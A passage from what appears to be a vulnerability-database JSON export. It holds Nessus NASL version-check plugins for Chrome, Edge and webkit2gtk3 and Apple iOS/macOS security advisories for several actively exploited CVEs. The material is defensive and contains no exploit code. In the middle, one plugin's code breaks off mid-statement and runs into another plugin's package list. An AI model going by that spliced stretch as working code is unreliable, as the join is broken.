(CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://docs.microsoft.com/en-us/DeployEdge/microsoft-edge-relnotes-security#march-26-2022\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?991726b8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Microsoft Edge version 99.0.1150.55 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_edge_chromium_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Edge (Chromium)\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nvar app_info = vcf::get_app_info(app:'Microsoft Edge (Chromium)', win_local:TRUE);\nvar constraints = [\n { 'fixed_version' : '99.0.1150.55' }\n];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-04T15:16:00", "description": "The version of Google Chrome installed on the remote macOS host is prior to 99.0.4844.84. It is, therefore, affected by a vulnerability as referenced in the 2022_03_stable-channel-update-for-desktop_25 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-25T00:00:00", "type": "nessus", "title": "Google Chrome < 99.0.4844.84 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1096"], "modified": "2023-11-03T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_99_0_4844_84.NASL", "href": "https://www.tenable.com/plugins/nessus/159236", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159236);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/03\");\n\n script_cve_id(\"CVE-2022-1096\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0126-S\");\n\n script_name(english:\"Google 
Chrome < 99.0.4844.84 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 99.0.4844.84. It is, therefore, affected by\na vulnerability as referenced in the 2022_03_stable-channel-update-for-desktop_25 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-1096)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?671782b7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1309225\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 99.0.4844.84 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/25\");\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'99.0.4844.84', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-04T19:04:06", "description": "The remote Oracle Linux 9 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2023-2653 advisory.\n\n - A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free vulnerability. This flaw allows attackers with network access to pass specially crafted web content files, causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205 security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2. 
(CVE-2023-2203)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-05-15T00:00:00", "type": "nessus", "title": "Oracle Linux 9 : webkit2gtk3 (ELSA-2023-2653)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-08-02T00:00:00", "cpe": ["cpe:/o:oracle:linux:9", "p-cpe:/a:oracle:linux:webkit2gtk3", "p-cpe:/a:oracle:linux:webkit2gtk3-devel", "p-cpe:/a:oracle:linux:webkit2gtk3-jsc", "p-cpe:/a:oracle:linux:webkit2gtk3-jsc-devel"], "id": "ORACLELINUX_ELSA-2023-2653.NASL", "href": "https://www.tenable.com/plugins/nessus/175689", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2023-2653.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(175689);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/08/02\");\n\n script_cve_id(\"CVE-2023-2203\");\n\n script_name(english:\"Oracle Linux 9 : webkit2gtk3 (ELSA-2023-2653)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 9 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2023-2653 advisory.\n\n - A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free\n vulnerability. This flaw allows attackers with network access to pass specially crafted web content files,\n causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205\n security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux\n 9.2. 
(CVE-2023-2203)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2023-2653.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-2203\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/05/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/05/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(os_release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:os_release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 9', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\nvar pkgs = [\n {'reference':'webkit2gtk3-2.38.5-1.el9_2.1', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.38.5-1.el9_2.1', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.38.5-1.el9_2.1', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.38.5-1.el9_2.1', 'cpu':'aarch64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.38.5-1.el9_2.1', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.38.5-1.el9_2.1', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.38.5-1.el9_2.1', 'cpu':'i686', 
'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.38.5-1.el9_2.1', 'cpu':'i686', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.38.5-1.el9_2.1', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.38.5-1.el9_2.1', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.38.5-1.el9_2.1', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.38.5-1.el9_2.1', 'cpu':'x86_64', 'release':'9', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release) {\n if (exists_check) {\n if (rpm_exists(release:_release, rpm:exists_check) && rpm_check(release:_release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, 
'content/dist/rhel8/8/x86_64/sap-solutions/os',\n 'content/dist/rhel8/8/x86_64/sap-solutions/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/sap/debug',\n 'content/dist/rhel8/8/x86_64/sap/os',\n 'content/dist/rhel8/8/x86_64/sap/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/supplementary/debug',\n 'content/dist/rhel8/8/x86_64/supplementary/os',\n 'content/dist/rhel8/8/x86_64/supplementary/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'webkit2gtk3-2.38.5-1.el8_8.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.38.5-1.el8_8.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.38.5-1.el8_8.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.38.5-1.el8_8.3', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = 
pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-devel / webkit2gtk3-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "apple": [{"lastseen": "2023-11-08T22:08:18", "description": "# About the security content of iOS 16.4.1 and iPadOS 16.4.1\n\nThis document describes the security content of iOS 16.4.1 and iPadOS 16.4.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. 
Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## iOS 16.4.1 and iPadOS 16.4.1\n\nReleased April 7, 2023\n\n**IOSurfaceAccelerator**\n\nAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later\n\nImpact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: An out-of-bounds write issue was addressed with improved input validation.\n\nCVE-2023-28206: Cl\u00e9ment Lecigne of Google's Threat Analysis Group and Donncha \u00d3 Cearbhaill of Amnesty International\u2019s Security Lab\n\n**WebKit**\n\nAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nWebKit Bugzilla: 254797\n\nCVE-2023-28205: Cl\u00e9ment Lecigne of Google's Threat Analysis Group and Donncha \u00d3 Cearbhaill of Amnesty International\u2019s Security Lab\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 31, 2023\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-07T00:00:00", "type": "apple", "title": "About the security content of iOS 16.4.1 and iPadOS 16.4.1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205", "CVE-2023-28206"], "modified": "2023-04-07T00:00:00", "id": "APPLE:99268A3B7560FFD18FBA01ACF4C3686D", "href": "https://support.apple.com/kb/HT213720", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T22:08:19", "description": "# About the security content of macOS Ventura 13.3.1\n\nThis document describes the security content of macOS Ventura 13.3.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. 
Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## macOS Ventura 13.3.1\n\nReleased April 7, 2023\n\n**IOSurfaceAccelerator**\n\nAvailable for: macOS Ventura\n\nImpact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: An out-of-bounds write issue was addressed with improved input validation.\n\nCVE-2023-28206: Cl\u00e9ment Lecigne of Google's Threat Analysis Group and Donncha \u00d3 Cearbhaill of Amnesty International\u2019s Security Lab\n\n**WebKit**\n\nAvailable for: macOS Ventura\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nWebKit Bugzilla: 254797\n\nCVE-2023-28205: Cl\u00e9ment Lecigne of Google's Threat Analysis Group and Donncha \u00d3 Cearbhaill of Amnesty International\u2019s Security Lab\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 31, 2023\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-07T00:00:00", "type": "apple", "title": "About the security content of macOS Ventura 13.3.1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205", "CVE-2023-28206"], "modified": "2023-04-07T00:00:00", "id": "APPLE:C0D7C1E42F184FC31F8109C2C5484099", "href": "https://support.apple.com/kb/HT213721", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T22:08:19", "description": "# About the security content of iOS 15.7.5 and iPadOS 15.7.5\n\nThis document describes the security content of iOS 15.7.5 and iPadOS 15.7.5.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. 
Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## iOS 15.7.5 and iPadOS 15.7.5\n\nReleased April 10, 2023\n\n**IOSurfaceAccelerator**\n\nAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)\n\nImpact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: An out-of-bounds write issue was addressed with improved input validation.\n\nCVE-2023-28206: Cl\u00e9ment Lecigne of Google's Threat Analysis Group and Donncha \u00d3 Cearbhaill of Amnesty International\u2019s Security Lab\n\n**WebKit**\n\nAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nWebKit Bugzilla: 254797\n\nCVE-2023-28205: Cl\u00e9ment Lecigne of Google's Threat Analysis Group and Donncha \u00d3 Cearbhaill of Amnesty International\u2019s Security Lab\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 27, 2023\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-10T00:00:00", "type": "apple", "title": "About the security content of iOS 15.7.5 and iPadOS 15.7.5", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205", "CVE-2023-28206"], "modified": "2023-04-10T00:00:00", "id": "APPLE:4D00E7FBD6D305B98412E984CF5CBEB0", "href": "https://support.apple.com/kb/HT213723", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-09T15:00:27", "description": "# About the security content of macOS Big Sur 11.7.6\n\nThis document describes the security content of macOS Big Sur 11.7.6.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. 
Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## macOS Big Sur 11.7.6\n\nReleased April 10, 2023\n\n**IOSurfaceAccelerator**\n\nAvailable for: macOS Big Sur\n\nImpact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: An out-of-bounds write issue was addressed with improved input validation.\n\nCVE-2023-28206: Cl\u00e9ment Lecigne of Google's Threat Analysis Group and Donncha \u00d3 Cearbhaill of Amnesty International\u2019s Security Lab\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by 